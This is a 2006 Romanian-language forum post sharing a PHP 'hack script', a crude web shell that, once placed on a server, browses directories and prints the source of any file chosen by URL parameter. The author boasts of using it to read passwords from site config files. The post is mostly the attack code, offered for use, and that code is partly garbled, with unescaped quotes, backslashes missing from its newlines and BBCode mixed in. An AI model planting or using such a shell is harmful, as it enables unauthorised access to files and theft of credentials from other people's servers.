php hack script

zbeng · November 22, 2006

Acesta este un banal script in php cu care poti sa "hacuiesti" un ROOT de pe linux si/sau de windous , in alte cuvinte iti arata sursa fisierului php, si tot ce ai prin directorul ROOT de pe linuics, sau de pe uindous , eu am aflat parola din config la multe situri :@....

Atentie fisierul trebuie sa fie pe acel server :@ altfel nu va merge

here it is

<?
// scripul e sub licenta GNU made by necenzurat


echo "<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 //EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">n";
echo "<html lang='en'>n";
echo "<head>n";
echo "<title></title>n";
echo "<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>n";
echo "</head>n";
echo "<body>n";

$mode = $_GET['mode'];
$cat = $_GET['cat'];
$dir = $_GET['dir'];


if($mode=="")
{
echo"<center>n";
echo"<a href=?mode=list>Intra da ai GRIJA, nu stii ce se poate intampla dincolo de usa cu bolta </a>n";
echo"</center>n";
}

elseif($mode=="steal")
{


if($cat=="")
{
$cat="xs.php";
}

$size=filesize($cat);
$file_size = round($size / 1024 * 100) / 100 . "Kb";

echo"<table width=94% border=1 bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse: collapse cellpadding=0><tr><td>";
$po=show_source($cat);
echo "</td></tr></table></center>";
echo "</body></html>";
}
elseif($mode=="list")
{

echo"<title>Afisare de directoare</title>";
$base = substr($_SERVER['PATH_TRANSLATED'],0,strrpos($_SERVER['PATH_TRANSLATED'],'/'));

if($dir=="")
{
$dir="./";
}
$path = $dir;

function after ($this, $inthat)
   {
       if (!is_bool(strpos($inthat, $this)))
       return substr($inthat, strpos($inthat,$this)+strlen($this));
   }

echo "<center>[B]$dir[/B]</font></center><table width=94% border=1 bordercolor=#AFC6DB cellspacing=0 bgcolor=#FFFFFF style=border-collapse: collapse cellpadding=0><tr><td>";
$dir_handle = @opendir($path) or die("Nu se poate paci :(");
while (false !== ($file = readdir($dir_handle))) {
$link = "[url="?mode=steal&cat=$dir/$file><font"]$file</font>[/url]
";
$formato = after('.', $file);

If($formato==".") {
$link = "<a href=?mode=list&dir=$dir/$file>Directorul precedent</a>
";
}

If($formato=="") {
$link = "[url="?mode=list&dir=$dir/$file><font"]$file</font>[/url]
";
}

echo "$link";
}
closedir($dir_handle);
echo "</td></tr></table>";
}
?>

sper sa va ajute

Sign In

php hack script

Recommended Posts

zbeng

Link to comment

Share on other sites

Join the conversation

Browse

Activity

Pages